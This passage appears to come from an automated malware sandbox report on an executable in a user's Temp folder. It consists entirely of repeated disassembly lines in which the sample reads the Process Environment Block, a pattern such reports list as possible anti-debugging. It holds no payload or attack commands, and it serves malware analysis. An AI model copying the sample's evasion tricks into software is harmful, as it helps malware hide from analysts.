          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E3A1C mov eax, dword ptr fs:[00000030h]3_2_009E3A1C
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CAA16 mov eax, dword ptr fs:[00000030h]3_2_009CAA16
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CAA16 mov eax, dword ptr fs:[00000030h]3_2_009CAA16
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A04A2C mov eax, dword ptr fs:[00000030h]3_2_00A04A2C
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A04A2C mov eax, dword ptr fs:[00000030h]3_2_00A04A2C
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov eax, dword ptr fs:[00000030h]3_2_009C5210
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov ecx, dword ptr fs:[00000030h]3_2_009C5210
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov eax, dword ptr fs:[00000030h]3_2_009C5210
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov eax, dword ptr fs:[00000030h]3_2_009C5210
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D8A0A mov eax, dword ptr fs:[00000030h]3_2_009D8A0A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AA16 mov eax, dword ptr fs:[00000030h]3_2_00A8AA16
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AA16 mov eax, dword ptr fs:[00000030h]3_2_00A8AA16
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7B260 mov eax, dword ptr fs:[00000030h]3_2_00A7B260
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7B260 mov eax, dword ptr fs:[00000030h]3_2_00A7B260
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98A62 mov eax, dword ptr fs:[00000030h]3_2_00A98A62
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0927A mov eax, dword ptr fs:[00000030h]3_2_00A0927A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]3_2_009C9240
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]3_2_009C9240
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]3_2_009C9240
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]3_2_009C9240
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A54257 mov eax, dword ptr fs:[00000030h]3_2_00A54257
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8EA55 mov eax, dword ptr fs:[00000030h]3_2_00A8EA55
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2397 mov eax, dword ptr fs:[00000030h]3_2_009F2397
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A95BA5 mov eax, dword ptr fs:[00000030h]3_2_00A95BA5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FB390 mov eax, dword ptr fs:[00000030h]3_2_009FB390
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D1B8F mov eax, dword ptr fs:[00000030h]3_2_009D1B8F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D1B8F mov eax, dword ptr fs:[00000030h]3_2_009D1B8F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B mov eax, dword ptr fs:[00000030h]3_2_009F138B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B mov eax, dword ptr fs:[00000030h]3_2_009F138B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B mov eax, dword ptr fs:[00000030h]3_2_009F138B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8138A mov eax, dword ptr fs:[00000030h]3_2_00A8138A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7D380 mov ecx, dword ptr fs:[00000030h]3_2_00A7D380
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4BAD mov eax, dword ptr fs:[00000030h]3_2_009F4BAD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4BAD mov eax, dword ptr fs:[00000030h]3_2_009F4BAD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4BAD mov eax, dword ptr fs:[00000030h]3_2_009F4BAD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E3 mov ecx, dword ptr fs:[00000030h]3_2_00A723E3
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E3 mov ecx, dword ptr fs:[00000030h]3_2_00A723E3
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E3 mov eax, dword ptr fs:[00000030h]3_2_00A723E3
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A453CA mov eax, dword ptr fs:[00000030h]3_2_00A453CA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A453CA mov eax, dword ptr fs:[00000030h]3_2_00A453CA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EDBE9 mov eax, dword ptr fs:[00000030h]3_2_009EDBE9
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8131B mov eax, dword ptr fs:[00000030h]3_2_00A8131B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CF358 mov eax, dword ptr fs:[00000030h]3_2_009CF358
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CDB40 mov eax, dword ptr fs:[00000030h]3_2_009CDB40
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F3B7A mov eax, dword ptr fs:[00000030h]3_2_009F3B7A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F3B7A mov eax, dword ptr fs:[00000030h]3_2_009F3B7A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98B58 mov eax, dword ptr fs:[00000030h]3_2_00A98B58
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CDB60 mov ecx, dword ptr fs:[00000030h]3_2_009CDB60
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D849B mov eax, dword ptr fs:[00000030h]3_2_009D849B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A814FB mov eax, dword ptr fs:[00000030h]3_2_00A814FB
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]3_2_00A46CF0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]3_2_00A46CF0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]3_2_00A46CF0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98CD6 mov eax, dword ptr fs:[00000030h]3_2_00A98CD6
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]3_2_00A9740D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]3_2_00A9740D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]3_2_00A9740D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]3_2_00A46C0A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]3_2_00A46C0A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]3_2_00A46C0A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]3_2_00A46C0A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FBC2C mov eax, dword ptr fs:[00000030h]3_2_009FBC2C
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA44B mov eax, dword ptr fs:[00000030h]3_2_009FA44B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E746D mov eax, dword ptr fs:[00000030h]3_2_009E746D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5C450 mov eax, dword ptr fs:[00000030h]3_2_00A5C450
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5C450 mov eax, dword ptr fs:[00000030h]3_2_00A5C450
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FFD9B mov eax, dword ptr fs:[00000030h]3_2_009FFD9B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FFD9B mov eax, dword ptr fs:[00000030h]3_2_009FFD9B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A905AC mov eax, dword ptr fs:[00000030h]3_2_00A905AC
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A905AC mov eax, dword ptr fs:[00000030h]3_2_00A905AC
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]3_2_009C2D8A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]3_2_009C2D8A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]3_2_009C2D8A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]3_2_009C2D8A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]3_2_009C2D8A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]3_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]3_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]3_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]3_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]3_2_009F1DB5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]3_2_009F1DB5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]3_2_009F1DB5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
